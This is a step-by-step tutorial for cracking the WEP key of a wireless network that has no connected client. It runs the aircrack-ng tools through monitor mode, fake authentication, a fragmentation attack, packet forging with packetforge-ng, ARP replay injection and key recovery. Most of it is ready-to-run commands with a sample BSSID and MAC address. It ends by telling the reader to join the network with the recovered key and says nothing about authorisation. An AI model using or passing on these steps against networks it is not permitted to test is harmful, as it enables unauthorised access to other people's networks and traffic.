Cracking WEP with No Client

Overview of steps taken:

1.      Start card in monitor mode with airmon-ng

2.      Search for available networks using airodump-ng

3.      Find victim network and gather info.

4.      Disable monitor mode and re-enable in victim channel

5.      Start airodump-ng

6.       Fake auth with the AP

7.       Obtain PGRA key stream using chop chop or fragmentation

8.       Create packet for injection using packetforge-ng

9.       Inject the packet you created into the network using ARP replay

10.   With enough IVs, crack the WEP key using aircrack-ng

First we run airmon-ng to see our current wireless interfaces.

airmon-ng

If you have any VAPs running kill them with the airmon-ng stop command. Now start up a new VAP in monitor mode.

airmon-ng start wlan0

With monitor mode enabled on mon0, we can use that interface to look for our target network.

airodump-ng mon0

Take note of the following:

·        Target network ESSID

·        BSSID

·        Channel #

·        Using WEP encryption

·        Your wireless card’s MAC address (obtained from ifconfig)

Now that we have gathered our information we can kill our current VAP and start it on the correct channel.

airmon-ng stop mon0

airmon-ng start wlan0 1

Let’s start airodump again but filter it out for our target network and specify the output file.

airodump-ng –c 1 –bssid 58:6D:8F:74:40:9B –w noclient mon0

Let this session of airodump run in the background so we can capture the IVs generated.

To increase the success of our later injection attacks we must first run a fake auth attack.

aireplay-ng -1 60 –e Buddy –a 58:6D:8F:74:40:9B –h 00:C0:CA:32:3D:85 mon0

Let the fake auth attack run in the background and open a new terminal.

Now we can begin our chopchop or fragmentation attack to obtain the PGRA key stream. In this example I will be using the fragmentation attack. In the new terminal type:

aireplay-ng -5 –b  58:6D:8F:74:40:9B –h 00:C0:CA:32:3D:85 mon0

Once a packet is found hit “y” to continue the attack.

You now have a saved key stream that can be used with packetforge.

Using packetforge-ng and our saved key stream, we will create a packet for injection.

packetforge-ng -0 –a 58:6D:8F:74:40:9B –h 00:C0:CA:32:3D:85 –k 255.255.255.255  –l 255.255.255.255 –y fragment-0114-044641.xor –w arp_packet

We can now use the interactive packet replay attack to inject the ARP packet we just created.

aireplay-ng -2 –r arp_packet mon0

Hit “y” and your packet will be injected. Check airodump to see if you IVs are being captured.

Once you have a fair amount of IVs, you can attempt to crack the key. Open a new terminal and type:

aircrack-ng -0 noclient*.cap

Success! You can now use the decrypted WEP key to get on the wireless network. If unsuccessful, continue to attempt cracking every 5,000 IVs captured.